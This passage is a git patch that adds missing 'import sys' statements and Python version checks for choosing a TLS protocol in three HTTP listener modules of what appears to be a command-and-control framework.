00:00:00 2001 From: xorrior Date: Thu, 2 Nov 2017 22:21:25 -0400 Subject: [PATCH 50/50] Add missing import --- lib/listeners/http.py | 1 + lib/listeners/http_com.py | 2 ++ lib/listeners/http_mapi.py | 2 ++ 3 files changed, 5 insertions(+) diff --git a/lib/listeners/http.py b/lib/listeners/http.py index 9155696..80458a5 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -974,6 +974,7 @@ def send_message(packets=None): pyversion = sys.version_info # support any version of tls + pyversion = sys.version_info if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: proto = ssl.PROTOCOL_TLS elif pyversion[0] >= 3: diff --git a/lib/listeners/http_com.py b/lib/listeners/http_com.py index 4117bf3..fdaa409 100644 --- a/lib/listeners/http_com.py +++ b/lib/listeners/http_com.py @@ -5,6 +5,7 @@ import os import ssl import time import copy +import sys from pydispatch import dispatcher from flask import Flask, request, make_response @@ -636,6 +637,7 @@ class Listener: certPath = os.path.abspath(certPath) # support any version of tls + pyversion = sys.version_info if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: proto = ssl.PROTOCOL_TLS elif pyversion[0] >= 3: diff --git a/lib/listeners/http_mapi.py b/lib/listeners/http_mapi.py index 41c8e73..222994a 100644 --- a/lib/listeners/http_mapi.py +++ b/lib/listeners/http_mapi.py @@ -5,6 +5,7 @@ import os import ssl import time import copy +import sys from pydispatch import dispatcher from flask import Flask, request, make_response @@ -618,6 +619,7 @@ class Listener: certPath = os.path.abspath(certPath) # support any version of tls + pyversion = sys.version_info if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: proto = ssl.PROTOCOL_TLS elif pyversion[0] >= 3: